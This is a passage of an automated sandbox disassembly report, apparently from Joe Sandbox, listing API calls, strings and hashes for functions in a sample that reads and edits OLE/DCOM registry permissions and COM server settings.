                                                                          • Instruction Fuzzy Hash: 0B2130B5504B08BFFA211F70DC89EAB7AADFB4A749F414414F26A911A0D7B53D418AB0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2F34D
                                                                          • #324.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F35E
                                                                          • #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F375
                                                                          • #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F38F
                                                                          • #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3AA
                                                                          • #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3C0
                                                                          • #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3DA
                                                                          • #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3EF
                                                                          • #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F400
                                                                          • #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F40F
                                                                          • #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F420
                                                                          • #861.MFC42U(00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F436
                                                                          • #861.MFC42U(00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F442
                                                                          • #861.MFC42U(00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F453
                                                                          • #861.MFC42U(00D221A0,00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F45F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #567$#540#861$#324H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 1167559088-0
                                                                          • Opcode ID: 332da30f99cc25c7912327402d3a42583ace422d1ff6273bab53ec275c43ef2a
                                                                          • Instruction ID: 967b60752a9aaa0ad1f877d8f33e21645d0bb013f889ba8100715f50106670e2
                                                                          • Opcode Fuzzy Hash: 332da30f99cc25c7912327402d3a42583ace422d1ff6273bab53ec275c43ef2a
                                                                          • Instruction Fuzzy Hash: DB314971A0179AEBDB15EB64C9027ECBBA0AF64304F50405CA5812B3C2DBF42B09CBF1
                                                                          APIs
                                                                            • Part of subcall function 00D3D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
                                                                            • Part of subcall function 00D3D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
                                                                            • Part of subcall function 00D3D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738
                                                                          • lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00D3B6E0
                                                                          • lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00D3B726
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B749
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B76E
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B7B1
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B7DC
                                                                          • #5273.MFC42U(80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,00D22778), ref: 00D3B809
                                                                          • #1197.MFC42U(These changes will take effect after you restart your computer.,00000000,00000000), ref: 00D3B81F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcmpi$#1197#5273CloseOpenQueryValue
                                                                          • String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE$These changes will take effect after you restart your computer.
                                                                          • API String ID: 2271089683-166272277
                                                                          • Opcode ID: d743d9928ff7be574a9b36d0b7b3966ce0adee04a6e79a28ec94a8cb01e20239
                                                                          • Instruction ID: 60e17cd2a58d25c8eb96e22dbe4a191c302e19cfec4e5726105e3c15b8a5a1d6
                                                                          • Opcode Fuzzy Hash: d743d9928ff7be574a9b36d0b7b3966ce0adee04a6e79a28ec94a8cb01e20239
                                                                          • Instruction Fuzzy Hash: 2741F9B0780325BAEB305B20EC87F7A7369EB11B18F150126FB14F50C2D7B0AD498A74
                                                                          APIs
                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00D43B00,00000FA0), ref: 00D3F1B0
                                                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00D3F1BB
                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D3F1CC
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D3F1DE
                                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D3F1EC
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D3F21E
                                                                          • DeleteCriticalSection.KERNEL32(00D43B00,00000007), ref: 00D3F245
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00D3F255
                                                                          Strings
                                                                          • SleepConditionVariableCS, xrefs: 00D3F1D8
                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D3F1B6
                                                                          • kernel32.dll, xrefs: 00D3F1C7
                                                                          • WakeAllConditionVariable, xrefs: 00D3F1E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                          • API String ID: 2565136772-3242537097
                                                                          • Opcode ID: 80cad4e2c6a5820495b64a6c368960cac7791ffdb10fc8914f4cb0a6a71142c6
                                                                          • Instruction ID: 712fcbb39f3d99f78aa23ac5d9d09158548f4ece849c2b08f1a6032f16957f1e
                                                                          • Opcode Fuzzy Hash: 80cad4e2c6a5820495b64a6c368960cac7791ffdb10fc8914f4cb0a6a71142c6
                                                                          • Instruction Fuzzy Hash: 1301A13DE45721ABC7215FB8BC1DF2B3AA8EB96B55F080020F904E2350DE60CD408AB5
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2F29A
                                                                          • lstrcpyW.KERNEL32(?,Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|,00000548), ref: 00D2F2AD
                                                                          • #355.MFC42U(00000001,00000000,00D221A0,00001804,?), ref: 00D2F2D0
                                                                          • #2507.MFC42U ref: 00D2F2E8
                                                                          • #3494.MFC42U(?), ref: 00D2F2FF
                                                                          • #858.MFC42U(00000000,?), ref: 00D2F30F
                                                                          • #800.MFC42U(00000000,?), ref: 00D2F31D
                                                                          • #6330.MFC42U(00000000,00000000,?), ref: 00D2F325
                                                                          • #800.MFC42U ref: 00D2F330
                                                                          • #641.MFC42U ref: 00D2F33B
                                                                          Strings
                                                                          • Open COM Surrogate Server, xrefs: 00D2F2DE
                                                                          • Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|, xrefs: 00D2F2A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
                                                                          • String ID: Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|$Open COM Surrogate Server
                                                                          • API String ID: 2485399651-276578773
                                                                          • Opcode ID: e3409fb5fa26ef1284832fd5ce39e5bcf15abaf1eed6671e5e07edb2683383e6
                                                                          • Instruction ID: 92c8907c30ddd686ee604db25adf9791eccc1b7804c07e60cee93083ac9f45a1
                                                                          • Opcode Fuzzy Hash: e3409fb5fa26ef1284832fd5ce39e5bcf15abaf1eed6671e5e07edb2683383e6
                                                                          • Instruction Fuzzy Hash: 08011E71940628AEDB14EB54DC91AEEB768EF25309F8004E9F545A31C1DFB45F88CE71
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2EF2A
                                                                          • lstrcpyW.KERNEL32(?,Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|,00000548), ref: 00D2EF3D
                                                                          • #355.MFC42U(00000001,00000000,00D221A0,00001804,?), ref: 00D2EF60
                                                                          • #2507.MFC42U ref: 00D2EF78
                                                                          • #3494.MFC42U(?), ref: 00D2EF8F
                                                                          • #858.MFC42U(00000000,?), ref: 00D2EF9F
                                                                          • #800.MFC42U(00000000,?), ref: 00D2EFAD
                                                                          • #6330.MFC42U(00000000,00000000,?), ref: 00D2EFB5
                                                                          • #800.MFC42U ref: 00D2EFC0
                                                                          • #641.MFC42U ref: 00D2EFCB
                                                                          Strings
                                                                          • Open COM Server, xrefs: 00D2EF6E
                                                                          • Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|, xrefs: 00D2EF31
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
                                                                          • String ID: Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|$Open COM Server
                                                                          • API String ID: 2485399651-2085683529
                                                                          • Opcode ID: fe3b0ef16ca7aaf5a30629d162d5f5400987b11625956357dd4dfafb77c25bbc
                                                                          • Instruction ID: 8f56b6558aaf5d13e4cb8398bf95086742d6aee83884db5e0896e7d0f9f8d9e6
                                                                          • Opcode Fuzzy Hash: fe3b0ef16ca7aaf5a30629d162d5f5400987b11625956357dd4dfafb77c25bbc
                                                                          • Instruction Fuzzy Hash: 0C011E71940A28AEDB14EB94DC91AEEB769EF24309F8000E9B145A21C1DFB45F88CE71
                                                                          APIs
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D3BF47
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D3BF51
                                                                          • GetExplicitEntriesFromAclW.ADVAPI32(?,?,?), ref: 00D3BF7F
                                                                          • SetEntriesInAclW.ADVAPI32(?,?,00000000,?), ref: 00D3BF94
                                                                          • MakeAbsoluteSD.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00D3BFBD
                                                                          • MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D3C018
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D3C030
                                                                          • MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D3C044
                                                                          • LocalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D3C053
                                                                          • MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D3C065
                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00D3C0A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Make$AbsoluteDaclDescriptorEntriesLocalRelativeSecuritySelf$AllocErrorExplicitFreeFromLast
                                                                          • String ID:
                                                                          • API String ID: 559786115-0
                                                                          • Opcode ID: 9cab04980193d7f4f1d48db11491ff49ecbbf54e4d277a9f7f7d5424beb70e5e
                                                                          • Instruction ID: 23978a0d7f30930ab60209a594f81afff04f33a76823f9529128ba9bb143ad73
                                                                          • Opcode Fuzzy Hash: 9cab04980193d7f4f1d48db11491ff49ecbbf54e4d277a9f7f7d5424beb70e5e
                                                                          • Instruction Fuzzy Hash: 9551B4B6A00219AF9B11DF95DC85EEFBBBCEF09750F144026FA05E2220D7359A54CBB0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast
                                                                          • String ID: PATH$\
                                                                          • API String ID: 485612231-1896636505
                                                                          • Opcode ID: f82299104a77c2c5a50e79c4a8c93896d0bcd124638be090077f1526253c0060
                                                                          • Instruction ID: 7171231c11d6ab5b874927b3817a5f7679386dec22e6ddfafda69257cb4d5639
                                                                          • Opcode Fuzzy Hash: f82299104a77c2c5a50e79c4a8c93896d0bcd124638be090077f1526253c0060
                                                                          • Instruction Fuzzy Hash: E791D5719E820FDFEB158BE4CC91BEEF7BBEF01316F204519D420A6181EBB589438695
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D30BE4
                                                                            • Part of subcall function 00D3D2F7: wsprintfW.USER32 ref: 00D3D35B
                                                                            • Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,00D260AC), ref: 00D3D376
                                                                            • Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,?), ref: 00D3D37E
                                                                            • Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                            • Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                            • Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                            • Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                            • Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                            • Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F
                                                                          • #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00D30C33
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D30C46
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D30C57
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D30C6F
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D30C80
                                                                          • UpdateWindow.USER32(?), ref: 00D30C8C
                                                                          • #2634.MFC42U(00000001), ref: 00D30C9A
                                                                          • #2634.MFC42U(00000001,00000001), ref: 00D30CA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#2634$lstrcat$#540#800CloseH_prolog3_OpenQueryUpdateValueWindowwsprintf
                                                                          • String ID: LaunchPermission
                                                                          • API String ID: 2454494747-4257139491
                                                                          • Opcode ID: fb612941511b827aeaa69bd89f645dd62b3fcaadae0de99ef451d07ac0bb8794
                                                                          • Instruction ID: 0d50426caf1758c544315cff115809df126107dc8be6f86f6b1c0dac10bb3111
                                                                          • Opcode Fuzzy Hash: fb612941511b827aeaa69bd89f645dd62b3fcaadae0de99ef451d07ac0bb8794
                                                                          • Instruction Fuzzy Hash: 31216035640314ABEB21AF21DC4AFE63B69DF46740F454070BE09AE1D2CBB16985C7B0
                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(?,aut32.dll), ref: 00D37B9C
                                                                          • RegOpenKeyW.ADVAPI32(00000000,Ole1Class,?), ref: 00D37C54
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D37C89
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
                                                                          • #861.MFC42U(?), ref: 00D37EDA
                                                                          • RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$#861Openlstrcmpi
                                                                          • String ID: Ole1Class$ToolboxBitmap$ToolboxBitmap32
                                                                          • API String ID: 3677012654-1216609433
                                                                          • Opcode ID: a76b9fb18c72efa134a359c738b416ecd0ab4fa42792abd41b384de5d8c150a2
                                                                          • Instruction ID: 6248544194c541435333441388f43a23b782ee79ee42ec3bfcedd4275277de7f
                                                                          • Opcode Fuzzy Hash: a76b9fb18c72efa134a359c738b416ecd0ab4fa42792abd41b384de5d8c150a2
                                                                          • Instruction Fuzzy Hash: 7D21F7B594461DDFDB20DF10DC88BD977B8BB24305F0401E5E51AA62A1DB709E94DF30
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D2E81D
                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2E848
                                                                          • SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2E86C
                                                                          • #1662.MFC42U ref: 00D2E874
                                                                            • Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                            • Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                            • Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                            • Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                            • Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                            • Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F
                                                                          • #2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTACCESSPERMISSION), ref: 00D2E896
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
                                                                          • String ID: Can Access$DEFAULTACCESSPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
                                                                          • API String ID: 3233431167-2986021116
                                                                          • Opcode ID: 6aefe4ed45d9632237b62f807e8e7a0a0fb363ddac02f263ea5e3bbc71936e9d
                                                                          • Instruction ID: a938844137b36b1d5782ca9fac5529651faafcdb2be905292d015b8c34bbe3a6
                                                                          • Opcode Fuzzy Hash: 6aefe4ed45d9632237b62f807e8e7a0a0fb363ddac02f263ea5e3bbc71936e9d
                                                                          • Instruction Fuzzy Hash: 84017171500318AFEB10AFA0DC46FEF7BB9EB45714F100519F501B2280C7B599558AB9
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D2EA0D
                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2EA38
                                                                          • SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2EA5C
                                                                          • #1662.MFC42U ref: 00D2EA64
                                                                            • Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                            • Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                            • Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                            • Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                            • Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                            • Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F
                                                                          • #2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTLAUNCHPERMISSION), ref: 00D2EA86
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
                                                                          • String ID: Can Launch$DEFAULTLAUNCHPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
                                                                          • API String ID: 3233431167-4187468794
                                                                          • Opcode ID: 7b2daae79707055ab68f666a0136e84ae4615ec2bab522db10946f9cbed2d548
                                                                          • Instruction ID: 9675d381a3a6b3585a4a2cd78b7fbb71c46f7255021ae7cf8287782c0cce9653
                                                                          • Opcode Fuzzy Hash: 7b2daae79707055ab68f666a0136e84ae4615ec2bab522db10946f9cbed2d548
                                                                          • Instruction Fuzzy Hash: 2E017171500318AFEB10AFA4DC46FEF7BB9EB85714F000419F501B6280C7B99A558AB5
                                                                          APIs
                                                                            • Part of subcall function 00D3B37C: __EH_prolog3.LIBCMT ref: 00D3B383
                                                                            • Part of subcall function 00D3B37C: #324.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B395
                                                                            • Part of subcall function 00D3B37C: #540.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3A7
                                                                            • Part of subcall function 00D3B37C: #861.MFC42U(00D221A0,00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3B8
                                                                          • #858.MFC42U(?,?,23685920), ref: 00D32D5E
                                                                          • #2506.MFC42U(?,?,23685920), ref: 00D32D69
                                                                          • #800.MFC42U(?,?,23685920), ref: 00D32D7A
                                                                          • #641.MFC42U(?,?,23685920), ref: 00D32D85
                                                                          • #858.MFC42U(?,?,?,23685920), ref: 00D32D99
                                                                          • #2910.MFC42U(00000104,?,?,?,23685920), ref: 00D32DB2
                                                                          • #5568.MFC42U(000000FF,00000104,?,?,?,23685920), ref: 00D32E4F
                                                                          • #800.MFC42U(000000FF,00000104,?,?,?,23685920), ref: 00D32E61
                                                                          • #641.MFC42U(000000FF,00000104,?,?,?,23685920), ref: 00D32E6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #641#800#858$#2506#2910#324#540#5568#861H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 1871001060-0
                                                                          • Opcode ID: b956a72d237133cd048fe196d9e7120977aae2028344d5b045ff36e9a691b845
                                                                          • Instruction ID: 8ec104dbe4b26bafe151150a39b4de57dcd4ed61248d40bbd6f881a9e72df1cf
                                                                          • Opcode Fuzzy Hash: b956a72d237133cd048fe196d9e7120977aae2028344d5b045ff36e9a691b845
                                                                          • Instruction Fuzzy Hash: F551F570D00209DBDB14EBA8D996BEEB7B5FF04310F244529E022B72E1DB349A05CB71
                                                                          APIs
